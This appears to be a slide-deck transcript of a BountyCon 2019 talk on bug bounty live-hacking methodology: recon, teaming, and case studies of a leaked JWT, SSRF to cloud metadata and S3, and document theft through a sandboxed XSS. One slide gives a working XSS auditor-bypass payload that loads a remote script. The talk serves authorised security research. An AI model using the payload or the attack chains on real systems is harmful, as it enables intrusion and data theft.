$30 off During Our Annual Pro Sale. View Details »

Live Hacking like a MVH – A walkthrough on methodology and strategies to win big

Frans Rosén
March 30, 2019

Live Hacking like a MVH – A walkthrough on methodology and strategies to win big

These are the slides from by talk at the Facebook/Google hosted event BountyCon 2019 held in Singapore on the 30th of March 2019.

Frans Rosén

March 30, 2019
Tweet

More Decks by Frans Rosén

Other Decks in Research

Transcript

  1. None
  2. Live Hacking like a MVH – 
 A walkthrough on

    methodology and strategies to win big Frans Rosén – @fransrosen
  3. Frans Rosén – @fransrosen Frans Rosén @fransrosen Security Advisor at

    Detectify #6 on HackerOne leaderboard/all-time Blogs at labs.detectify.com
  4. Frans Rosén – @fransrosen Frans Rosén @fransrosen H1-702 2017: Winner

    of MVH in Vegas! (Uber, Salesforce, Zenefits)
 H1-514 2018: Winner of MVH in Montreal! (Shopify)
 H1-415 2018: Winner Best team @teamsweden in San Francisco (Oath) H1-212 2018: Winner Earning the most $$$ @unitedstatesofsweden in New York (Oath) H1-212 2018: Winner Highest reputation @unitedstatesofsweden in New York (Oath) H1-702 2018: Winner Best bug @teamsweden in Vegas (Uber) H1-212 2018: Winner Best bug @unitedstatesofsweden in New York (Oath)
 H1-202 2018: Winner Best bug in Washington (Mapbox)
 H1-3120 2018: Winner Best bug in Amsterdam (Dropbox) H1-514 2018: Winner Highest reputation in Montreal (Shopify)
  5. Frans Rosén – @fransrosen Frans Rosén @fransrosen H1-702 2017: Winner

    of MVH in Vegas! (Uber, Salesforce, Zenefits)
 H1-514 2018: Winner of MVH in Montreal! (Shopify)
 H1-415 2018: Winner Best team @teamsweden in San Francisco (Oath) H1-212 2018: Winner Earning the most $$$ @unitedstatesofsweden in New York (Oath) H1-212 2018: Winner Highest reputation @unitedstatesofsweden in New York (Oath) H1-702 2018: Winner Best bug @teamsweden in Vegas (Uber) H1-212 2018: Winner Best bug @unitedstatesofsweden in New York (Oath)
 H1-202 2018: Winner Best bug in Washington (Mapbox)
 H1-3120 2018: Winner Best bug in Amsterdam (Dropbox) H1-514 2018: Winner Highest reputation in Montreal (Shopify)
  6. Frans Rosén – @fransrosen What is Live Hacking?

  7. Frans Rosén – @fransrosen 30 second elevator pitch • A

    "hacker-meets-dev face-to-face" bug bounty with special targets • First by HackerOne in 2016 in Vegas • More companies runs these nowadays.
 H1, Bugcrowd, Facebook/Google, Visma. Smaller companies run their own also
  8. Frans Rosén – @fransrosen (Inofficial first event in 2015) Me

    and Justin Calmus, then CSO at Zenefits drinking Old fashioneds in Vegas "We should bring some hackers together and hack"
  9. Frans Rosén – @fransrosen (Inofficial first event in 2015) Me

    and Justin Calmus, then CSO at Zenefits drinking Old fashioneds in Vegas "We should bring some hackers together and hack"
  10. Frans Rosén – @fransrosen (Inofficial first event in 2015) Night

    after, 7 hackers in a suite at MGM
  11. Frans Rosén – @fransrosen $101.000 paid that night! I went

    home with $51.000 after 7 hours of hacking
  12. Frans Rosén – @fransrosen A quick step by step

  13. Frans Rosén – @fransrosen 1. Hackers gets an intro and

    a walkthrough • Hangout, slides, presented by the company itself • Ability to ask questions
  14. Frans Rosén – @fransrosen 1. Hackers gets an intro and

    a walkthrough • Hangout, slides, presented by the company itself • Ability to ask questions 2. Often a bigger scope • Often *.company.com, *.company.dev, infrastructure, IPs • Open source repos by the company • Enterprise access to products • One time social engineering(!)
  15. Frans Rosén – @fransrosen 3. Hackers gets some time do

    do recon • This is a VERY important part • One time 48 hours. Hard! • Slack instance with the company!
  16. Frans Rosén – @fransrosen 3. Hackers gets some time do

    do recon • This is a VERY important part • One time 48 hours. Hard! • Slack instance with the company! 4. Some allow pre-submissions • Awesome! Less preasure on final day • Faster payouts on event day
  17. Frans Rosén – @fransrosen 5. Arriving to event, meeting the

    company • At HQ or hacking event (Defcon, Black Hat, Nullcon etc) • Discussions here == PRICELESS!! • Valid bugs because I could discuss with the company - This domain, what does it do?
 - Is this app supposed to work like this?
 - I noticed this weird behaviour, I think I can do this, what do you think?
  18. Frans Rosén – @fransrosen 6. Day of event. Wake up

    early, shower and HACK • If no pre-submissions, get reports in! • Hacking day is special, sit in teams, collaboration(!) • Found many bugs on the actual day!
  19. Frans Rosén – @fransrosen Some events 
 without pre-submissions 


    awards "first X valid bugs"
  20. Frans Rosén – @fransrosen Enter bountyplz!

  21. Frans Rosén – @fransrosen github.com/fransr/bountyplz

  22. Frans Rosén – @fransrosen github.com/fransr/bountyplz

  23. Frans Rosén – @fransrosen github.com/fransr/bountyplz

  24. Frans Rosén – @fransrosen github.com/fransr/bountyplz

  25. Frans Rosén – @fransrosen github.com/fransr/bountyplz Upcoming version, batch-mode • 24

    reports sent in 4 seconds
  26. Frans Rosén – @fransrosen 7. Show & Tell • Best

    part of event • Customer picks bugs to be presented • Amazing! Other hacker’s bugs in a cool micro-talk style (5min max)
  27. Frans Rosén – @fransrosen Strategy/Methodology

  28. Frans Rosén – @fransrosen Strategy/Methodology The most interesting part. How

    to approach targets? This is my experience, other might do differently!
  29. Frans Rosén – @fransrosen Good overview of scope Make sure

    you have/know: • credentials needed • what domains are included, subdomains/acquisitions • what NOT to focus on (out-of-scope) • upgrades to enterprise accounts if promised
  30. Frans Rosén – @fransrosen Teaming

  31. Frans Rosén – @fransrosen Teaming! Seriously, this is EXTREMELY VALUABLE

    I’ve made more money hacking as a team
  32. Frans Rosén – @fransrosen Teaming! Team up with someone that:

    • put in "similar" effort to you • might know stuff you don't • helps you cover more target surface • you can communicate with and brainstorm
  33. Frans Rosén – @fransrosen Teaming! Team up with someone that:

    • put in "similar" effort to you • might know stuff you don't • helps you cover more target surface • you can communicate with and brainstorm Keep team small, 2-4. If 3 or more, effort will differ, allow to split differently 
 For 2 people, 50% each is always the simplest.
  34. Frans Rosén – @fransrosen What do focus on?

  35. Frans Rosén – @fransrosen High threshold or labour intensive testing

    • Best bugs!

  36. Frans Rosén – @fransrosen High threshold or labour intensive testing

    • Best bugs!
 
 Example: trying all integrations from a list of 80.
 Read docs on how each worked
 
 Found a $20k bug due to one (1!!!) faulty implementation!
  37. Frans Rosén – @fransrosen How SDK talks with API •

    Desktop client • Web (API-paths in JS-files) • PHP/Java/Golang-SDKs • npm/composer/yarn

  38. Frans Rosén – @fransrosen How SDK talks with API •

    Desktop client • Web (API-paths in JS-files) • PHP/Java/Golang-SDKs • npm/composer/yarn Legacy versions of APIs? • Older versions working? • Are there docs? Web-archive?

  39. Frans Rosén – @fransrosen Integrations with 3rd parties (!) •

    Have integrations? (Slack, Trello, Zapier etc) • Allow integrations? (OAuth etc) • Public repos with examples?

  40. Frans Rosén – @fransrosen Integrations with 3rd parties (!) •

    Have integrations? (Slack, Trello, Zapier etc) • Allow integrations? (OAuth etc) • Public repos with examples?
 Company's Github repos • What software they use (Forks) • Synched with original repo? (No: vulns by diffing versions?)

  41. Frans Rosén – @fransrosen Github • Internal domains? Search in

    Gists, Github, Google • "Internal indicators", search everywhere • Domains/AWS/GCP-tools in org: "org:xxx amazonaws" etc
  42. Frans Rosén – @fransrosen Github • Internal domains? Search in

    Gists, Github, Google • "Internal indicators", search everywhere • Domains/AWS/GCP-tools in org: "org:xxx amazonaws" etc • Any users in organization? • Extract contributors from repos • Company name in users’ repos: "user:xxx company-name" • Search Github Issues, funky stuff by accident! • Non-forked repos in organization ‣ Package dependencies from employees? ‣ Still hired by the company? If not, bad
  43. Frans Rosén – @fransrosen Whitebox testing on company's FOSS •

    Bugs might mean bugs in prod! • Might mean company made other companies vulnerable 
 (really bad PR for the company)
  44. Frans Rosén – @fransrosen Whitebox testing on company's FOSS •

    Bugs might mean bugs in prod! • Might mean company made other companies vulnerable 
 (really bad PR for the company) LEGACY • Content from web-archive, read old documentation(!!!) • URLs from web-archive's CDX-api, commoncrawl etc. • Test all URLs. Distinguish status-codes / bytes received (Wfuzz) • Anything interesting? Filter file-types, deduplicate
  45. Frans Rosén – @fransrosen Regular recon There is soooo much

    here we can't cover it all. These are general things • DNS, Subbrute, sublist3r etc. So many tools! ‣ Customized subbrute with 3rd party data ‣ Generate DNS-wordlist based on findings • Existing routes from JS-files, Burp History • postMessage-tracker (logs all listener functions) • Wfuzz target (VPN with switchable IP if blocked)
  46. Frans Rosén – @fransrosen Regular recon There is soooo much

    here we can't cover it all. These are general things • DNS, Subbrute, sublist3r etc. So many tools! ‣ Customized subbrute with 3rd party data ‣ Generate DNS-wordlist based on findings • Existing routes from JS-files, Burp History • postMessage-tracker (logs all listener functions) • Wfuzz target (VPN with switchable IP if blocked) Best protip: Focus on BORING/HARD STUFF, other hackers won’t
  47. Frans Rosén – @fransrosen Notes While you hack. KISS! •

    Dir for target, TXT-file always open • Comments (snippets / indicators / urls) • Super helpful. Chaining bugs!
 - If an Open-Redirect, we can make a chain • Test-code, SDKs, screenshots in dir • Valid vulns in one place, separate from "interesting behaviour"
  48. Frans Rosén – @fransrosen Notes • On event, team up

    sharing "interesting behaviour" things • Burp history is golden, save it! Search alot! 
 
 Found bugs by searching:
  49. Frans Rosén – @fransrosen SSRF-testing server • ONLY reachable by

    internal network (Both ipv4/ipv6) • Virtual host / kubernetes node is bad, due to requirement of Host-header.
 Not all SSRF send proper Host-header 
 (HTTP/1.0, binding external DNS-host to internal IP etc)
 • Different files, depends on SSRF:
 MP3, ICS, XML, TXT, HTML, PNG, JPG, SVG etc.
 • If internal hosts can be reached without scanning internal network.
 One company had flags in files, simple to prove you could access.
  50. Frans Rosén – @fransrosen SSRF-testing server Should be an open

    source project
 Anyone up for it?
  51. Frans Rosén – @fransrosen

  52. Frans Rosén – @fransrosen Show & Tell!

  53. Frans Rosén – @fransrosen Unscoped JWT-token exposed in Squid proxy-error

  54. Frans Rosén – @fransrosen On-Premise/SaaS app

  55. Frans Rosén – @fransrosen Did not like internal requests

  56. Frans Rosén – @fransrosen But we see our own request

    headers
  57. Frans Rosén – @fransrosen And what about IPv6?

  58. Frans Rosén – @fransrosen Wow, a LOT more headers

  59. Frans Rosén – @fransrosen And here’s a JWT? JWT

  60. Frans Rosén – @fransrosen Nothing in the JWT said anything

    about my instance
  61. Frans Rosén – @fransrosen Sent a report

  62. Frans Rosén – @fransrosen Sent a Slack-DM to the company

    and asked
  63. Frans Rosén – @fransrosen

  64. Frans Rosén – @fransrosen

  65. Frans Rosén – @fransrosen ?

  66. Frans Rosén – @fransrosen JWT-token could access everyone

  67. Frans Rosén – @fransrosen Fix! Unique ID instead of admin

  68. Frans Rosén – @fransrosen

  69. Frans Rosén – @fransrosen Second order RCE 4 hours later

  70. Frans Rosén – @fransrosen Burp Collaborator payload gave a hit!

  71. Frans Rosén – @fransrosen Burp Collaborator payload gave a hit!

    WTH??
  72. Frans Rosén – @fransrosen Let’s trigger "a few"

  73. Frans Rosén – @fransrosen Burp Intruder

  74. Frans Rosén – @fransrosen Header

  75. Frans Rosén – @fransrosen Header

  76. Frans Rosén – @fransrosen Header

  77. Frans Rosén – @fransrosen Header

  78. Frans Rosén – @fransrosen Header

  79. Frans Rosén – @fransrosen XSS on sandboxed domain
 stealing data

    from privileged domain
  80. Frans Rosén – @fransrosen Document-service ACME.COM Create new doc

  81. Frans Rosén – @fransrosen Document-service ACME.COM Create new doc usersandbox.com

    postMessage
  82. Frans Rosén – @fransrosen Document-service ACME.COM Create new doc usersandbox.com

    postMessage {"document":"AAA…"}
  83. Frans Rosén – @fransrosen XSS in the sandbox usersandbox.com

  84. Frans Rosén – @fransrosen Chrome XSS auditor bypass </script>
 <script>


    x=document.createElement('script');
 x.src=atob('MY-URL-BASE64-ENCODED');
 document.body.appendChild(x)-'%0d',({//#
  85. Frans Rosén – @fransrosen User opens link from sandbox usersandbox.com

    ACME.COM Create new doc
  86. Frans Rosén – @fransrosen User uploads doc, iframe opens usersandbox.com

    ACME.COM Create new doc usersandbox.com
  87. Frans Rosén – @fransrosen Hijack iframe, due to Same-Origin Policy

    usersandbox.com ACME.COM Create new doc usersandbox.com
  88. Frans Rosén – @fransrosen Uploads doc, postMessage usersandbox.com ACME.COM usersandbox.com

  89. Frans Rosén – @fransrosen Iframe leaks data to attacker usersandbox.com

    ACME.COM usersandbox.com
  90. Frans Rosén – @fransrosen We stole the document! usersandbox.com ACME.COM

    usersandbox.com
  91. Frans Rosén – @fransrosen We stole the document! usersandbox.com ACME.COM

    usersandbox.com
  92. Frans Rosén – @fransrosen DNS-hijack leading to RCE

  93. Frans Rosén – @fransrosen DNS-hijack on internal.company.com!

  94. Frans Rosén – @fransrosen Not a new thing, watch my

    talk from Secfest 2017
  95. Frans Rosén – @fransrosen DNS-hijack on internal.company.com! Awesome, what now?

  96. Frans Rosén – @fransrosen Testing tool, only allowed their own

    subdomains
  97. Frans Rosén – @fransrosen Testing tool, only allowed their own

    subdomains
  98. Frans Rosén – @fransrosen Let’s create a subdomain to metadata

  99. Frans Rosén – @fransrosen Let’s create a subdomain to metadata

  100. Frans Rosén – @fransrosen IPv6 FTW!

  101. Frans Rosén – @fransrosen BOOM!

  102. Frans Rosén – @fransrosen Asking to go deeper

  103. Frans Rosén – @fransrosen Asking to go deeper

  104. Frans Rosén – @fransrosen Asking to go deeper Nothing. Creds

    are limited :(
  105. Frans Rosén – @fransrosen User-data

  106. Frans Rosén – @fransrosen User-data S3-bucket

  107. Frans Rosén – @fransrosen And yeeees! Full read/write access to

    S3-bucket
  108. Frans Rosén – @fransrosen Files in bucket used in deploy-script

  109. Frans Rosén – @fransrosen Best bug of the event

  110. Frans Rosén – @fransrosen Final words 1. Use the time

    before 2. Consuming tasks no one bothers 3. Move around, but if interesting, be persistent! 4. Work as a team, it’s amazing. Thank you!